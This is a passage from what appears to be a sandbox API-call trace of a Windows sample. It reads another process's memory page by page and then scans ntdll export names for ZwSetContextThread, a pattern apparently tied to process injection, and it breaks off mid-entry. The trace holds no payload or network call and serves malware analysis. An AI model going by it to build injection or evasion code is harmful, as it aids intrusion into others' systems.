NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fcc000, Buffer=0x7ff9, BufferSize=0x27bc000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.784] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fcd000, Buffer=0x7ff9, BufferSize=0x27bd000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.785] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fce000, Buffer=0x7ff9, BufferSize=0x27be000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.785] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fcf000, Buffer=0x7ff9, BufferSize=0x27bf000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.785] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fd0000, Buffer=0x7ff9, BufferSize=0x27c0000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.785] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fd1000, Buffer=0x7ff9, BufferSize=0x27c1000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.785] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fd2000, Buffer=0x7ff9, BufferSize=0x27c2000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.785] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fd3000, Buffer=0x7ff9, BufferSize=0x27c3000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.785] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fd4000, Buffer=0x7ff9, BufferSize=0x27c4000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.785] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fd5000, Buffer=0x7ff9, BufferSize=0x27c5000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.785] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fd6000, Buffer=0x7ff9, BufferSize=0x27c6000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.785] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fd7000, Buffer=0x7ff9, BufferSize=0x27c7000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.785] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fd8000, Buffer=0x7ff9, BufferSize=0x27c8000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.786] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fd9000, Buffer=0x7ff9, BufferSize=0x27c9000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.786] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fda000, Buffer=0x7ff9, BufferSize=0x27ca000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.786] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fdb000, Buffer=0x7ff9, BufferSize=0x27cb000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.786] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fdc000, Buffer=0x7ff9, BufferSize=0x27cc000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.786] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fdd000, Buffer=0x7ff9, BufferSize=0x27cd000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.786] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fde000, Buffer=0x7ff9, BufferSize=0x27ce000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.786] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fdf000, Buffer=0x7ff9, BufferSize=0x27cf000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.786] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fe0000, Buffer=0x7ff9, BufferSize=0x27d0000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.786] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fe1000, Buffer=0x7ff9, BufferSize=0x27d1000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.786] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fe2000, Buffer=0x7ff9, BufferSize=0x27d2000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.786] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fe3000, Buffer=0x7ff9, BufferSize=0x27d3000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.787] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fe4000, Buffer=0x7ff9, BufferSize=0x27d4000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.787] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fe5000, Buffer=0x7ff9, BufferSize=0x27d5000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.787] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fe6000, Buffer=0x7ff9, BufferSize=0x27d6000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.787] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fe7000, Buffer=0x7ff9, BufferSize=0x27d7000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.787] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fe8000, Buffer=0x7ff9, BufferSize=0x27d8000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.787] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fe9000, Buffer=0x7ff9, BufferSize=0x27d9000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.787] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fea000, Buffer=0x7ff9, BufferSize=0x27da000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.787] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77feb000, Buffer=0x7ff9, BufferSize=0x27db000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.787] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fec000, Buffer=0x7ff9, BufferSize=0x27dc000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.787] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fed000, Buffer=0x7ff9, BufferSize=0x27dd000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.787] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fee000, Buffer=0x7ff9, BufferSize=0x27de000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.787] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fef000, Buffer=0x7ff9, BufferSize=0x27df000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.788] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77ff0000, Buffer=0x7ff9, BufferSize=0x27e0000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.788] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77ff1000, Buffer=0x7ff9, BufferSize=0x27e1000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.788] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77ff2000, Buffer=0x7ff9, BufferSize=0x27e2000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.788] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77ff3000, Buffer=0x7ff9, BufferSize=0x27e3000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.788] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77ff4000, Buffer=0x7ff9, BufferSize=0x27e4000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.788] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77ff5000, Buffer=0x7ff9, BufferSize=0x27e5000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.788] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77ff6000, Buffer=0x7ff9, BufferSize=0x27e6000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.788] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77ff7000, Buffer=0x7ff9, BufferSize=0x27e7000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.788] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77ff8000, Buffer=0x7ff9, BufferSize=0x27e8000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.788] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77ff9000, Buffer=0x7ff9, BufferSize=0x27e9000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.788] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77ffa000, Buffer=0x7ff9, BufferSize=0x27ea000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.789] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77ffb000, Buffer=0x7ff9, BufferSize=0x27eb000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.789] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77ffc000, Buffer=0x7ff9, BufferSize=0x27ec000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.789] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77ffd000, Buffer=0x7ff9, BufferSize=0x27ed000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.789] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77ffe000, Buffer=0x7ff9, BufferSize=0x27ee000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.789] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fff000, Buffer=0x7ff9, BufferSize=0x27ef000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.789] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x78000000, Buffer=0x7ff9, BufferSize=0x27f0000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.789] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x78001000, Buffer=0x7ff9, BufferSize=0x27f1000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.789] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x78002000, Buffer=0x7ff9, BufferSize=0x27f2000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.789] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x78003000, Buffer=0x7ff9, BufferSize=0x27f3000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.789] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x78004000, Buffer=0x7ff9, BufferSize=0x27f4000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.789] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x78005000, Buffer=0x7ff9, BufferSize=0x27f5000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.789] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x78006000, Buffer=0x7ff9, BufferSize=0x27f6000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.790] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x78007000, Buffer=0x7ff9, BufferSize=0x27f7000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.790] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x78008000, Buffer=0x7ff9, BufferSize=0x27f8000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.790] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x78009000, Buffer=0x7ff9, BufferSize=0x27f9000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.790] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x7800a000, Buffer=0x7ff9, BufferSize=0x27fa000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.790] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x7800b000, Buffer=0x7ff9, BufferSize=0x27fb000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.790] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x7800c000, Buffer=0x7ff9, BufferSize=0x27fc000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.790] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x7800d000, Buffer=0x7ff9, BufferSize=0x27fd000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.790] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x7800e000, Buffer=0x7ff9, BufferSize=0x27fe000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.790] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x7800f000, Buffer=0x7ff9, BufferSize=0x27ff000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.790] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x78010000, Buffer=0x7ff9, BufferSize=0x2800000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.790] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x78011000, Buffer=0x7ff9, BufferSize=0x2801000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.791] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x78012000, Buffer=0x7ff9, BufferSize=0x2802000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.791] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x78013000, Buffer=0x7ff9, BufferSize=0x2803000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.791] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x78014000, Buffer=0x7ff9, BufferSize=0x2804000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.791] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x78015000, Buffer=0x7ff9, BufferSize=0x2805000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.791] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x78016000, Buffer=0x7ff9, BufferSize=0x2806000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.791] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x78017000, Buffer=0x7ff9, BufferSize=0x2807000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.791] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x78018000, Buffer=0x7ff9, BufferSize=0x2808000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.791] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x78019000, Buffer=0x7ff9, BufferSize=0x2809000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.791] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x7801a000, Buffer=0x7ff9, BufferSize=0x280a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.791] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x7801b000, Buffer=0x7ff9, BufferSize=0x280b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.791] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x7801c000, Buffer=0x7ff9, BufferSize=0x280c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.792] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x7801d000, Buffer=0x7ff9, BufferSize=0x280d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.792] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x7801e000, Buffer=0x7ff9, BufferSize=0x280e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.792] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x7801f000, Buffer=0x7ff9, BufferSize=0x280f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.792] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x78020000, Buffer=0x7ff9, BufferSize=0x2810000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.792] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x78021000, Buffer=0x7ff9, BufferSize=0x2811000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.792] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x78022000, Buffer=0x7ff9, BufferSize=0x2812000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.792] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x78023000, Buffer=0x7ff9, BufferSize=0x2813000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.792] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x78024000, Buffer=0x7ff9, BufferSize=0x2814000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.792] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x78025000, Buffer=0x7ff9, BufferSize=0x2815000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.792] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x78026000, Buffer=0x7ff9, BufferSize=0x2816000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.792] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x78027000, Buffer=0x7ff9, BufferSize=0x2817000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.792] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x78028000, Buffer=0x7ff9, BufferSize=0x2818000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.806] lstrcmpA (lpString1="A_SHAFinal", lpString2="ZwSetContextThread") returned -1 [0206.806] lstrcmpA (lpString1="A_SHAInit", lpString2="ZwSetContextThread") returned -1 [0206.806] lstrcmpA (lpString1="A_SHAUpdate", lpString2="ZwSetContextThread") returned -1 [0206.806] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="ZwSetContextThread") returned -1 [0206.806] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="ZwSetContextThread") returned -1 [0206.806] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="ZwSetContextThread") returned -1 [0206.806] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="ZwSetContextThread") returned -1 [0206.806] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="ZwSetContextThread") returned -1 [0206.806] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="ZwSetContextThread") returned -1 [0206.806] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="ZwSetContextThread") returned -1 [0206.806] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="ZwSetContextThread") returned -1 [0206.806] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="ZwSetContextThread") returned -1 [0206.806] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="ZwSetContextThread") returned -1 [0206.806] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="ZwSetContextThread") returned -1 [0206.806] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="ZwSetContextThread") returned -1 [0206.806] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="ZwSetContextThread") returned -1 [0206.806] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="ZwSetContextThread") returned -1 [0206.806] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="ZwSetContextThread") returned -1 [0206.806] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="ZwSetContextThread") returned -1 [0206.806] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="ZwSetContextThread") returned -1 [0206.806] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="ZwSetContextThread") returned -1 [0206.806] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="ZwSetContextThread") returned -1 [0206.806] lstrcmpA (lpString1="CsrCaptureMessageMultiUnicodeStringsInPlace", lpString2="ZwSetContextThread") returned -1 [0206.806] lstrcmpA (lpString1="CsrCaptureMessageString", lpString2="ZwSetContextThread") returned -1 [0206.806] lstrcmpA (lpString1="CsrCaptureTimeout", lpString2="ZwSetContextThread") returned -1 [0206.806] lstrcmpA (lpString1="CsrClientCallServer", lpString2="ZwSetContextThread") returned -1 [0206.806] lstrcmpA (lpString1="CsrClientConnectToServer", lpString2="ZwSetContextThread") returned -1 [0206.806] lstrcmpA (lpString1="CsrFreeCaptureBuffer", lpString2="ZwSetContextThread") returned -1 [0206.806] lstrcmpA (lpString1="CsrGetProcessId", lpString2="ZwSetContextThread") returned -1 [0206.806] lstrcmpA (lpString1="CsrIdentifyAlertableThread", lpString2="ZwSetContextThread") returned -1 [0206.806] lstrcmpA (lpString1="CsrSetPriorityClass", lpString2="ZwSetContextThread") returned -1 [0206.806] lstrcmpA (lpString1="CsrVerifyRegion", lpString2="ZwSetContextThread") returned -1 [0206.806] lstrcmpA (lpString1="DbgBreakPoint", lpString2="ZwSetContextThread") returned -1 [0206.806] lstrcmpA (lpString1="DbgPrint", lpString2="ZwSetContextThread") returned -1 [0206.806] lstrcmpA (lpString1="DbgPrintEx", lpString2="ZwSetContextThread") returned -1 [0206.806] lstrcmpA (lpString1="DbgPrintReturnControlC", lpString2="ZwSetContextThread") returned -1 [0206.806] lstrcmpA (lpString1="DbgPrompt", lpString2="ZwSetContextThread") returned -1 [0206.806] lstrcmpA (lpString1="DbgQueryDebugFilterState", lpString2="ZwSetContextThread") returned -1 [0206.806] lstrcmpA (lpString1="DbgSetDebugFilterState", lpString2="ZwSetContextThread") returned -1 [0206.807] lstrcmpA (lpString1="DbgUiConnectToDbg", lpString2="ZwSetContextThread") returned -1 [0206.807] lstrcmpA (lpString1="DbgUiContinue", lpString2="ZwSetContextThread") returned -1 [0206.807] lstrcmpA (lpString1="DbgUiConvertStateChangeStructure", lpString2="ZwSetContextThread") returned -1 [0206.807] lstrcmpA (lpString1="DbgUiConvertStateChangeStructureEx", lpString2="ZwSetContextThread") returned -1 [0206.807] lstrcmpA (lpString1="DbgUiDebugActiveProcess", lpString2="ZwSetContextThread") returned -1 [0206.807] lstrcmpA (lpString1="DbgUiGetThreadDebugObject", lpString2="ZwSetContextThread") returned -1 [0206.807] lstrcmpA (lpString1="DbgUiIssueRemoteBreakin", lpString2="ZwSetContextThread") returned -1 [0206.807] lstrcmpA (lpString1="DbgUiRemoteBreakin", lpString2="ZwSetContextThread") returned -1 [0206.807] lstrcmpA (lpString1="DbgUiSetThreadDebugObject", lpString2="ZwSetContextThread") returned -1 [0206.807] lstrcmpA (lpString1="DbgUiStopDebugging", lpString2="ZwSetContextThread") returned -1 [0206.807] lstrcmpA (lpString1="DbgUiWaitStateChange", 